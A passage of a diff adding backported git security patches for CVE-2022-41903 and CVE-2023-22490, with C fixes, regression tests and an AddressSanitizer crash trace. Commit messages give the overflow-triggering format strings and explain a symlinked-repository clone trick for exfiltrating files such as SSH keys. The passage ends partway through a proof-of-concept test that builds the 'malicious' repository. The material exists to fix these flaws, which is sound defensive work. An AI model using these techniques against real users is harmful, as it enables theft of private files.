64 total_consumed++;
65 }
66- len = utf8_strnwidth(local_sb.buf, -1, 1);
67+ len = utf8_strnwidth(local_sb.buf, local_sb.len, 1);
68
69 if (c->flush_type == flush_left_and_steal) {
70 const char *ch = sb->buf + sb->len - 1;
71diff --git a/utf8.c b/utf8.c
72index 5c8f151..a66984b 100644
73--- a/utf8.c
74+++ b/utf8.c
75@@ -206,13 +206,11 @@ int utf8_width(const char **start, size_t *remainder_p)
76 * string, assuming that the string is utf8. Returns strlen() instead
77 * if the string does not look like a valid utf8 string.
78 */
79-int utf8_strnwidth(const char *string, int len, int skip_ansi)
80+int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
81 {
82 int width = 0;
83 const char *orig = string;
84
85- if (len == -1)
86- len = strlen(string);
87 while (string && string < orig + len) {
88 int skip;
89 while (skip_ansi &&
90@@ -225,7 +223,7 @@ int utf8_strnwidth(const char *string, int len, int skip_ansi)
91
92 int utf8_strwidth(const char *string)
93 {
94- return utf8_strnwidth(string, -1, 0);
95+ return utf8_strnwidth(string, strlen(string), 0);
96 }
97
98 int is_utf8(const char *text)
99@@ -792,7 +790,7 @@ int skip_utf8_bom(char **text, size_t len)
100 void strbuf_utf8_align(struct strbuf *buf, align_type position, unsigned int width,
101 const char *s)
102 {
103- int slen = strlen(s);
104+ size_t slen = strlen(s);
105 int display_len = utf8_strnwidth(s, slen, 0);
106 int utf8_compensation = slen - display_len;
107
108diff --git a/utf8.h b/utf8.h
109index fcd5167..6da1b6d 100644
110--- a/utf8.h
111+++ b/utf8.h
112@@ -7,7 +7,7 @@ typedef unsigned int ucs_char_t; /* assuming 32bit int */
113
114 size_t display_mode_esc_sequence_len(const char *s);
115 int utf8_width(const char **start, size_t *remainder_p);
116-int utf8_strnwidth(const char *string, int len, int skip_ansi);
117+int utf8_strnwidth(const char *string, size_t len, int skip_ansi);
118 int utf8_strwidth(const char *string);
119 int is_utf8(const char *text);
120 int is_encoding_utf8(const char *name);
121--
1222.25.1
123
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
new file mode 100644
index 0000000000..3de6a5ba6a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
@@ -0,0 +1,67 @@
1From 17d23e8a3812a5ca3dd6564e74d5250f22e5d76d Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:47:00 +0100
4Subject: [PATCH 08/12] utf8: fix returning negative string width
5
6The `utf8_strnwidth()` function calls `utf8_width()` in a loop and adds
7its returned width to the end result. `utf8_width()` can return `-1`
8though in case it reads a control character, which means that the
9computed string width is going to be wrong. In the worst case where
10there are more control characters than non-control characters, we may
11even return a negative string width.
12
13Fix this bug by treating control characters as having zero width.
14
15Signed-off-by: Patrick Steinhardt <ps@pks.im>
16Signed-off-by: Junio C Hamano <gitster@pobox.com>
17
18Upstream-Status: Backport [https://github.com/git/git/commit/17d23e8a3812a5ca3dd6564e74d5250f22e5d76d]
19CVE: CVE-2022-41903
20Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
21---
22 t/t4205-log-pretty-formats.sh | 6 ++++++
23 utf8.c | 8 ++++++--
24 2 files changed, 12 insertions(+), 2 deletions(-)
25
26diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
27index 23ac508..261a6f0 100755
28--- a/t/t4205-log-pretty-formats.sh
29+++ b/t/t4205-log-pretty-formats.sh
30@@ -820,6 +820,12 @@ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping dire
31 test_cmp expect error
32 '
33
34+test_expect_success 'log --pretty with padding and preceding control chars' '
35+ printf "\20\20 0" >expect &&
36+ git log -1 --pretty="format:%x10%x10%>|(4)%x30" >actual &&
37+ test_cmp expect actual
38+'
39+
40 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
41 # We only assert that this command does not crash. This needs to be
42 # executed with the address sanitizer to demonstrate failure.
43diff --git a/utf8.c b/utf8.c
44index a66984b..6632bd2 100644
45--- a/utf8.c
46+++ b/utf8.c
47@@ -212,11 +212,15 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
48 const char *orig = string;
49
50 while (string && string < orig + len) {
51- int skip;
52+ int glyph_width, skip;
53+
54 while (skip_ansi &&
55 (skip = display_mode_esc_sequence_len(string)) != 0)
56 string += skip;
57- width += utf8_width(&string, NULL);
58+
59+ glyph_width = utf8_width(&string, NULL);
60+ if (glyph_width > 0)
61+ width += glyph_width;
62 }
63 return string ? width : len;
64 }
65--
662.25.1
67
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
new file mode 100644
index 0000000000..761d4c6a9f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
@@ -0,0 +1,162 @@
1From 937b71cc8b5b998963a7f9a33312ba3549d55510 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:47:04 +0100
4Subject: [PATCH 09/12] utf8: fix overflow when returning string width
5
6The return type of both `utf8_strwidth()` and `utf8_strnwidth()` is
7`int`, but we operate on string lengths which are typically of type
8`size_t`. This means that when the string is longer than `INT_MAX`, we
9will overflow and thus return a negative result.
10
11This can lead to an out-of-bounds write with `--pretty=format:%<1)%B`
12and a commit message that is 2^31+1 bytes long:
13
14 =================================================================
15 ==26009==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001168 at pc 0x7f95c4e5f427 bp 0x7ffd8541c900 sp 0x7ffd8541c0a8
16 WRITE of size 2147483649 at 0x603000001168 thread T0
17 #0 0x7f95c4e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
18 #1 0x5612bbb1068c in format_and_pad_commit pretty.c:1763
19 #2 0x5612bbb1087a in format_commit_item pretty.c:1801
20 #3 0x5612bbc33bab in strbuf_expand strbuf.c:429
21 #4 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
22 #5 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
23 #6 0x5612bba0a4d5 in show_log log-tree.c:781
24 #7 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
25 #8 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
26 #9 0x5612bb69235b in cmd_log_walk builtin/log.c:549
27 #10 0x5612bb6951a2 in cmd_log builtin/log.c:883
28 #11 0x5612bb56c993 in run_builtin git.c:466
29 #12 0x5612bb56d397 in handle_builtin git.c:721
30 #13 0x5612bb56db07 in run_argv git.c:788
31 #14 0x5612bb56e8a7 in cmd_main git.c:923
32 #15 0x5612bb803682 in main common-main.c:57
33 #16 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
34 #17 0x7f95c4c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
35 #18 0x5612bb5680e4 in _start ../sysdeps/x86_64/start.S:115
36
37 0x603000001168 is located 0 bytes to the right of 24-byte region [0x603000001150,0x603000001168)
38 allocated by thread T0 here:
39 #0 0x7f95c4ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
40 #1 0x5612bbcdd556 in xrealloc wrapper.c:136
41 #2 0x5612bbc310a3 in strbuf_grow strbuf.c:99
42 #3 0x5612bbc32acd in strbuf_add strbuf.c:298
43 #4 0x5612bbc33aec in strbuf_expand strbuf.c:418
44 #5 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
45 #6 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
46 #7 0x5612bba0a4d5 in show_log log-tree.c:781
47 #8 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
48 #9 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
49 #10 0x5612bb69235b in cmd_log_walk builtin/log.c:549
50 #11 0x5612bb6951a2 in cmd_log builtin/log.c:883
51 #12 0x5612bb56c993 in run_builtin git.c:466
52 #13 0x5612bb56d397 in handle_builtin git.c:721
53 #14 0x5612bb56db07 in run_argv git.c:788
54 #15 0x5612bb56e8a7 in cmd_main git.c:923
55 #16 0x5612bb803682 in main common-main.c:57
56 #17 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
57
58 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
59 Shadow bytes around the buggy address:
60 0x0c067fff81d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
61 0x0c067fff81e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
62 0x0c067fff81f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
63 0x0c067fff8200: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 00 fa
64 0x0c067fff8210: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
65 =>0x0c067fff8220: fd fa fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa
66 0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
67 0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
68 0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
69 0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
70 0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
71 Shadow byte legend (one shadow byte represents 8 application bytes):
72 Addressable: 00
73 Partially addressable: 01 02 03 04 05 06 07
74 Heap left redzone: fa
75 Freed heap region: fd
76 Stack left redzone: f1
77 Stack mid redzone: f2
78 Stack right redzone: f3
79 Stack after return: f5
80 Stack use after scope: f8
81 Global redzone: f9
82 Global init order: f6
83 Poisoned by user: f7
84 Container overflow: fc
85 Array cookie: ac
86 Intra object redzone: bb
87 ASan internal: fe
88 Left alloca redzone: ca
89 Right alloca redzone: cb
90 ==26009==ABORTING
91
92Now the proper fix for this would be to convert both functions to return
93an `size_t` instead of an `int`. But given that this commit may be part
94of a security release, let's instead do the minimal viable fix and die
95in case we see an overflow.
96
97Add a test that would have previously caused us to crash.
98
99Signed-off-by: Patrick Steinhardt <ps@pks.im>
100Signed-off-by: Junio C Hamano <gitster@pobox.com>
101
102Upstream-Status: Backport [https://github.com/git/git/commit/937b71cc8b5b998963a7f9a33312ba3549d55510]
103CVE: CVE-2022-41903
104Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
105---
106 t/t4205-log-pretty-formats.sh | 8 ++++++++
107 utf8.c | 12 +++++++++---
108 2 files changed, 17 insertions(+), 3 deletions(-)
109
110diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
111index 261a6f0..de15007 100755
112--- a/t/t4205-log-pretty-formats.sh
113+++ b/t/t4205-log-pretty-formats.sh
114@@ -843,4 +843,12 @@ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit mes
115 test_cmp expect actual
116 '
117
118+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message does not cause allocation failure' '
119+ test_must_fail git log -1 --format="%<(1)%B" $huge_commit 2>error &&
120+ cat >expect <<-EOF &&
121+ fatal: number too large to represent as int on this platform: 2147483649
122+ EOF
123+ test_cmp expect error
124+'
125+
126 test_done
127diff --git a/utf8.c b/utf8.c
128index 6632bd2..03be475 100644
129--- a/utf8.c
130+++ b/utf8.c
131@@ -208,11 +208,12 @@ int utf8_width(const char **start, size_t *remainder_p)
132 */
133 int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
134 {
135- int width = 0;
136 const char *orig = string;
137+ size_t width = 0;
138
139 while (string && string < orig + len) {
140- int glyph_width, skip;
141+ int glyph_width;
142+ size_t skip;
143
144 while (skip_ansi &&
145 (skip = display_mode_esc_sequence_len(string)) != 0)
146@@ -222,7 +223,12 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
147 if (glyph_width > 0)
148 width += glyph_width;
149 }
150- return string ? width : len;
151+
152+ /*
153+ * TODO: fix the interface of this function and `utf8_strwidth()` to
154+ * return `size_t` instead of `int`.
155+ */
156+ return cast_size_t_to_int(string ? width : len);
157 }
158
159 int utf8_strwidth(const char *string)
160--
1612.25.1
162
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
new file mode 100644
index 0000000000..bbfc6e758f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
@@ -0,0 +1,99 @@
1From 81c2d4c3a5ba0e6ab8c348708441fed170e63a82 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:47:10 +0100
4Subject: [PATCH 10/12] utf8: fix checking for glyph width in strbuf_utf8_replace()
5
6In `strbuf_utf8_replace()`, we call `utf8_width()` to compute the width
7of the current glyph. If the glyph is a control character though it can
8be that `utf8_width()` returns `-1`, but because we assign this value to
9a `size_t` the conversion will cause us to underflow. This bug can
10easily be triggered with the following command:
11
12 $ git log --pretty='format:xxx%<|(1,trunc)%x10'
13
14>From all I can see though this seems to be a benign underflow that has
15no security-related consequences.
16
17Fix the bug by using an `int` instead. When we see a control character,
18we now copy it into the target buffer but don't advance the current
19width of the string.
20
21Signed-off-by: Patrick Steinhardt <ps@pks.im>
22Signed-off-by: Junio C Hamano <gitster@pobox.com>
23
24Upstream-Status: Backport [https://github.com/git/git/commit/81c2d4c3a5ba0e6ab8c348708441fed170e63a82]
25CVE: CVE-2022-41903
26Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
27---
28 t/t4205-log-pretty-formats.sh | 7 +++++++
29 utf8.c | 19 ++++++++++++++-----
30 2 files changed, 21 insertions(+), 5 deletions(-)
31
32diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
33index de15007..52c8bc8 100755
34--- a/t/t4205-log-pretty-formats.sh
35+++ b/t/t4205-log-pretty-formats.sh
36@@ -826,6 +826,13 @@ test_expect_success 'log --pretty with padding and preceding control chars' '
37 test_cmp expect actual
38 '
39
40+test_expect_success 'log --pretty truncation with control chars' '
41+ test_commit "$(printf "\20\20\20\20xxxx")" file contents commit-with-control-chars &&
42+ printf "\20\20\20\20x.." >expect &&
43+ git log -1 --pretty="format:%<(3,trunc)%s" commit-with-control-chars >actual &&
44+ test_cmp expect actual
45+'
46+
47 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
48 # We only assert that this command does not crash. This needs to be
49 # executed with the address sanitizer to demonstrate failure.
50diff --git a/utf8.c b/utf8.c
51index 03be475..ec03e69 100644
52--- a/utf8.c
53+++ b/utf8.c
54@@ -377,6 +377,7 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
55 dst = sb_dst.buf;
56
57 while (src < end) {
58+ int glyph_width;
59 char *old;
60 size_t n;
61
62@@ -390,21 +391,29 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
63 break;
64
65 old = src;
66- n = utf8_width((const char**)&src, NULL);
67- if (!src) /* broken utf-8, do nothing */
68+ glyph_width = utf8_width((const char**)&src, NULL);
69+ if (!src) /* broken utf-8, do nothing */
70 goto out;
71- if (n && w >= pos && w < pos + width) {
72+
73+ /*
74+ * In case we see a control character we copy it into the
75+ * buffer, but don't add it to the width.
76+ */
77+ if (glyph_width < 0)
78+ glyph_width = 0;
79+
80+ if (glyph_width && w >= pos && w < pos + width) {
81 if (subst) {
82 memcpy(dst, subst, subst_len);
83 dst += subst_len;
84 subst = NULL;
85 }
86- w += n;
87+ w += glyph_width;
88 continue;
89 }
90 memcpy(dst, old, src - old);
91 dst += src - old;
92- w += n;
93+ w += glyph_width;
94 }
95 strbuf_setlen(&sb_dst, dst - sb_dst.buf);
96 strbuf_swap(sb_src, &sb_dst);
97--
982.25.1
99
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
new file mode 100644
index 0000000000..f339edfc8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
@@ -0,0 +1,90 @@
1From f930a2394303b902e2973f4308f96529f736b8bc Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:47:15 +0100
4Subject: [PATCH 11/12] utf8: refactor strbuf_utf8_replace to not rely on preallocated buffer
5
6In `strbuf_utf8_replace`, we preallocate the destination buffer and then
7use `memcpy` to copy bytes into it at computed offsets. This feels
8rather fragile and is hard to understand at times. Refactor the code to
9instead use `strbuf_add` and `strbuf_addstr` so that we can be sure that
10there is no possibility to perform an out-of-bounds write.
11
12Signed-off-by: Patrick Steinhardt <ps@pks.im>
13Signed-off-by: Junio C Hamano <gitster@pobox.com>
14
15Upstream-Status: Backport [https://github.com/git/git/commit/f930a2394303b902e2973f4308f96529f736b8bc]
16CVE: CVE-2022-41903
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 utf8.c | 34 +++++++++++++---------------------
20 1 file changed, 13 insertions(+), 21 deletions(-)
21
22diff --git a/utf8.c b/utf8.c
23index ec03e69..a13f5e3 100644
24--- a/utf8.c
25+++ b/utf8.c
26@@ -365,26 +365,20 @@ void strbuf_add_wrapped_bytes(struct strbuf *buf, const char *data, int len,
27 void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
28 const char *subst)
29 {
30- struct strbuf sb_dst = STRBUF_INIT;
31- char *src = sb_src->buf;
32- char *end = src + sb_src->len;
33- char *dst;
34- int w = 0, subst_len = 0;
35+ const char *src = sb_src->buf, *end = sb_src->buf + sb_src->len;
36+ struct strbuf dst;
37+ int w = 0;
38
39- if (subst)
40- subst_len = strlen(subst);
41- strbuf_grow(&sb_dst, sb_src->len + subst_len);
42- dst = sb_dst.buf;
43+ strbuf_init(&dst, sb_src->len);
44
45 while (src < end) {
46+ const char *old;
47 int glyph_width;
48- char *old;
49 size_t n;
50
51 while ((n = display_mode_esc_sequence_len(src))) {
52- memcpy(dst, src, n);
53+ strbuf_add(&dst, src, n);
54 src += n;
55- dst += n;
56 }
57
58 if (src >= end)
59@@ -404,21 +398,19 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
60
61 if (glyph_width && w >= pos && w < pos + width) {
62 if (subst) {
63- memcpy(dst, subst, subst_len);
64- dst += subst_len;
65+ strbuf_addstr(&dst, subst);
66 subst = NULL;
67 }
68- w += glyph_width;
69- continue;
70+ } else {
71+ strbuf_add(&dst, old, src - old);
72 }
73- memcpy(dst, old, src - old);
74- dst += src - old;
75+
76 w += glyph_width;
77 }
78- strbuf_setlen(&sb_dst, dst - sb_dst.buf);
79- strbuf_swap(sb_src, &sb_dst);
80+
81+ strbuf_swap(sb_src, &dst);
82 out:
83- strbuf_release(&sb_dst);
84+ strbuf_release(&dst);
85 }
86
87 /*
88--
892.25.1
90
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
new file mode 100644
index 0000000000..978865978d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
@@ -0,0 +1,124 @@
1From 304a50adff6480ede46b68f7545baab542cbfb46 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:47:23 +0100
4Subject: [PATCH 12/12] pretty: restrict input lengths for padding and wrapping formats
5
6Both the padding and wrapping formatting directives allow the caller to
7specify an integer that ultimately leads to us adding this many chars to
8the result buffer. As a consequence, it is trivial to e.g. allocate 2GB
9of RAM via a single formatting directive and cause resource exhaustion
10on the machine executing this logic. Furthermore, it is debatable
11whether there are any sane usecases that require the user to pad data to
122GB boundaries or to indent wrapped data by 2GB.
13
14Restrict the input sizes to 16 kilobytes at a maximum to limit the
15amount of bytes that can be requested by the user. This is not meant
16as a fix because there are ways to trivially amplify the amount of
17data we generate via formatting directives; the real protection is
18achieved by the changes in previous steps to catch and avoid integer
19wraparound that causes us to under-allocate and access beyond the
20end of allocated memory reagions. But having such a limit
21significantly helps fuzzing the pretty format, because the fuzzer is
22otherwise quite fast to run out-of-memory as it discovers these
23formatters.
24
25Signed-off-by: Patrick Steinhardt <ps@pks.im>
26Signed-off-by: Junio C Hamano <gitster@pobox.com>
27
28Upstream-Status: Backport [https://github.com/git/git/commit/304a50adff6480ede46b68f7545baab542cbfb46]
29CVE: CVE-2022-41903
30Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
31---
32 pretty.c | 26 ++++++++++++++++++++++++++
33 t/t4205-log-pretty-formats.sh | 24 +++++++++++++++---------
34 2 files changed, 41 insertions(+), 9 deletions(-)
35
36diff --git a/pretty.c b/pretty.c
37index c3c1443..e9687f0 100644
38--- a/pretty.c
39+++ b/pretty.c
40@@ -13,6 +13,13 @@
41 #include "gpg-interface.h"
42 #include "trailer.h"
43
44+/*
45+ * The limit for formatting directives, which enable the caller to append
46+ * arbitrarily many bytes to the formatted buffer. This includes padding
47+ * and wrapping formatters.
48+ */
49+#define FORMATTING_LIMIT (16 * 1024)
50+
51 static char *user_format;
52 static struct cmt_fmt_map {
53 const char *name;
54@@ -1029,6 +1036,15 @@ static size_t parse_padding_placeholder(const char *placeholder,
55 if (!*end || end == start)
56 return 0;
57 width = strtol(start, &next, 10);
58+
59+ /*
60+ * We need to limit the amount of padding, or otherwise this
61+ * would allow the user to pad the buffer by arbitrarily many
62+ * bytes and thus cause resource exhaustion.
63+ */
64+ if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
65+ return 0;
66+
67 if (next == start || width == 0)
68 return 0;
69 if (width < 0) {
70@@ -1188,6 +1204,16 @@ static size_t format_commit_one(struct strbuf *sb, /* in UTF-8 */
71 if (*next != ')')
72 return 0;
73 }
74+
75+ /*
76+ * We need to limit the format here as it allows the
77+ * user to prepend arbitrarily many bytes to the buffer
78+ * when rewrapping.
79+ */
80+ if (width > FORMATTING_LIMIT ||
81+ indent1 > FORMATTING_LIMIT ||
82+ indent2 > FORMATTING_LIMIT)
83+ return 0;
84 rewrap_message_tail(sb, c, width, indent1, indent2);
85 return end - placeholder + 1;
86 } else
87diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
88index 52c8bc8..572d02f 100755
89--- a/t/t4205-log-pretty-formats.sh
90+++ b/t/t4205-log-pretty-formats.sh
91@@ -809,15 +809,21 @@ test_expect_success 'log --pretty with magical wrapping directives' '
92 '
93
94 test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
95- cat >expect <<-EOF &&
96- fatal: number too large to represent as int on this platform: 2147483649
97- EOF
98- test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
99- test_cmp expect error &&
100- test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
101- test_cmp expect error &&
102- test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
103- test_cmp expect error
104+ printf "%%w(2147483649,1,1)0" >expect &&
105+ git log -1 --pretty="format:%w(2147483649,1,1)%x30" >actual &&
106+ test_cmp expect actual &&
107+ printf "%%w(1,2147483649,1)0" >expect &&
108+ git log -1 --pretty="format:%w(1,2147483649,1)%x30" >actual &&
109+ test_cmp expect actual &&
110+ printf "%%w(1,1,2147483649)0" >expect &&
111+ git log -1 --pretty="format:%w(1,1,2147483649)%x30" >actual &&
112+ test_cmp expect actual
113+'
114+
115+test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing padding directive' '
116+ printf "%%<(2147483649)0" >expect &&
117+ git log -1 --pretty="format:%<(2147483649)%x30" >actual &&
118+ test_cmp expect actual
119 '
120
121 test_expect_success 'log --pretty with padding and preceding control chars' '
122--
1232.25.1
124
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
new file mode 100644
index 0000000000..cc9b448c5c
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
@@ -0,0 +1,179 @@
1From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
2From: Taylor Blau <me@ttaylorr.com>
3Date: Tue, 24 Jan 2023 19:43:45 -0500
4Subject: [PATCH 1/3] t5619: demonstrate clone_local() with ambiguous transport
5
6When cloning a repository, Git must determine (a) what transport
7mechanism to use, and (b) whether or not the clone is local.
8
9Since f38aa83 (use local cloning if insteadOf makes a local URL,
102014-07-17), the latter check happens after the remote has been
11initialized, and references the remote's URL instead of the local path.
12This is done to make it possible for a `url.<base>.insteadOf` rule to
13convert a remote URL into a local one, in which case the `clone_local()`
14mechanism should be used.
15
16However, with a specially crafted repository, Git can be tricked into
17using a non-local transport while still setting `is_local` to "1" and
18using the `clone_local()` optimization. The below test case
19demonstrates such an instance, and shows that it can be used to include
20arbitrary (known) paths in the working copy of a cloned repository on a
21victim's machine[^1], even if local file clones are forbidden by
22`protocol.file.allow`.
23
24This happens in a few parts:
25
26 1. We first call `get_repo_path()` to see if the remote is a local
27 path. If it is, we replace the repo name with its absolute path.
28
29 2. We then call `transport_get()` on the repo name and decide how to
30 access it. If it was turned into an absolute path in the previous
31 step, then we should always treat it like a file.
32
33 3. We use `get_repo_path()` again, and set `is_local` as appropriate.
34 But it's already too late to rewrite the repo name as an absolute
35 path, since we've already fed it to the transport code.
36
37The attack works by including a submodule whose URL corresponds to a
38path on disk. In the below example, the repository "sub" is reachable
39via the dumb HTTP protocol at (something like):
40
41 http://127.0.0.1:NNNN/dumb/sub.git
42
43However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
44directory called "http:", then nested directories "127.0.0.1:NNNN", and
45"dumb") exists within the repository, too.
46
47To determine this, it first picks the appropriate transport, which is
48dumb HTTP. It then uses the remote's URL in order to determine whether
49the repository exists locally on disk. However, the malicious repository
50also contains an embedded stub repository which is the target of a
51symbolic link at the local path corresponding to the "sub" repository on
52disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
53pointing to the stub repository via ".git/modules/sub/../../../repo").
54
55This stub repository fools Git into thinking that a local repository
56exists at that URL and thus can be cloned locally. The affected call is
57in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
58locates a valid repository at that target.
59
60This then causes Git to set the `is_local` variable to "1", and in turn
61instructs Git to clone the repository using its local clone optimization
62via the `clone_local()` function.
63
64The exploit comes into play because the stub repository's top-level
65"$GIT_DIR/objects" directory is a symbolic link which can point to an
66arbitrary path on the victim's machine. `clone_local()` resolves the
67top-level "objects" directory through a `stat(2)` call, meaning that we
68read through the symbolic link and copy or hardlink the directory
69contents at the destination of the link.
70
71In other words, we can get steps (1) and (3) to disagree by leveraging
72the dangling symlink to pick a non-local transport in the first step,
73and then set is_local to "1" in the third step when cloning with
74`--separate-git-dir`, which makes the symlink non-dangling.
75
76This can result in data-exfiltration on the victim's machine when
77sensitive data is at a known path (e.g., "/home/$USER/.ssh").
78
79The appropriate fix is two-fold:
80
81 - Resolve the transport later on (to avoid using the local
82 clone optimization with a non-local transport).
83
84 - Avoid reading through the top-level "objects" directory when
85 (correctly) using the clone_local() optimization.
86
87This patch merely demonstrates the issue. The following two patches will
88implement each part of the above fix, respectively.
89
90[^1]: Provided that any target directory does not contain symbolic
91 links, in which case the changes from 6f054f9 (builtin/clone.c:
92 disallow `--local` clones with symlinks, 2022-07-28) will abort the
93 clone.
94
95Reported-by: yvvdwf <yvvdwf@gmail.com>
96Signed-off-by: Taylor Blau <me@ttaylorr.com>
97Signed-off-by: Junio C Hamano <gitster@pobox.com>
98
99Upstream-Status: Backport
100[https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]
101CVE: CVE-2023-22490
102Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
103---
104 t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
105 1 file changed, 63 insertions(+)
106 create mode 100644 t/t5619-clone-local-ambiguous-transport.sh
107
108diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
109new file mode 100644
110index 0000000..7ebd31a
111--- /dev/null
112+++ b/t/t5619-clone-local-ambiguous-transport.sh
113@@ -0,0 +1,63 @@
114+#!/bin/sh
115+
116+test_description='test local clone with ambiguous transport'
117+
118+. ./test-lib.sh
119+. "$TEST_DIRECTORY/lib-httpd.sh"
120+
121+if ! test_have_prereq SYMLINKS
122+then
123+ skip_all='skipping test, symlink support unavailable'
124+ test_done
125+fi
126+
127+start_httpd
128+
129+REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
130+URI="$HTTPD_URL/dumb/sub.git"
131+
132+test_expect_success 'setup' '
133+ mkdir -p sensitive &&
134+ echo "secret" >sensitive/secret &&
135+
136+ git init --bare "$REPO" &&
137+ test_commit_bulk -C "$REPO" --ref=main 1 &&
138+
139+ git -C "$REPO" update-ref HEAD main &&
140+ git -C "$REPO" update-server-info &&
141+
142+ git init malicious &&
143+ (
144+ cd malicious &&
145+
146+ git submodule add "$URI" &&
147+
148+ mkdir -p repo/refs &&
149+ touch repo/refs/.gitkeep &&
150+ printf "ref: refs/heads/a" >repo/HEAD &&
151+ ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
152+
153+ mkdir -p "$HTTPD_URL/dumb" &&
